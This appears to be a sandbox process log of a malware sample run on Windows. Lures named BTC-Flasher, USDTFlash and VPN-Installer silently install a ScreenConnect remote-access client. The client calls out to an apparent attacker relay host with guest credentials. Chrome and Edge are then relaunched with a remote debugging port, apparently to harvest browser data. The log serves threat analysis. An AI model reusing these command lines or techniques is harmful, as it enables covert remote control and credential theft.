C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI21CB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241312296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3C6B355A5EF4EFC2CF598C26657793FE
C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
"C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2768315ABA567584EAF240F4AFC1A088 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI88F1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241338671 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding FEEA12BC835B17E2AD65B7C8798CE3AF
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2F42ED5C44A32EA13B385C84E3F86E24 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=BTC-FLASHER"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "27f58587-14d5-42fd-bfbb-98030a75155c" "User"
C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
"C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26B8DDF1ED94A63CE5B26EE23F81610F C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241487796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 534679E3EBFC08C3DC704D3B0233A5D1
C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 59D8D72F1287F91E0BE7C7C04C28CA83 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI16EF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241506109 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C418B454B32A423B899570F451D93DD4
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1E80FE38758CB1456AB64F2E6DB7A23D E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FREE_VPN"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "5fb28501-c747-48d3-ac4b-586971fcfd21" "User"
C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe
"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications
C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe
"C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe81f8cc40,0x7ffe81f8cc4c,0x7ffe81f8cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=1732 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2404 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3332,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4524 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3604 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4932 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4896 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4884 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe81f93cb8,0x7ffe81f93cc8,0x7ffe81f93cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2032 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4040 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4024 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
"C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E7EE87381CB21AA8F6ED4A84B58BFC33 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIF3C8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242349093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\syswow64\MsiExec.exe
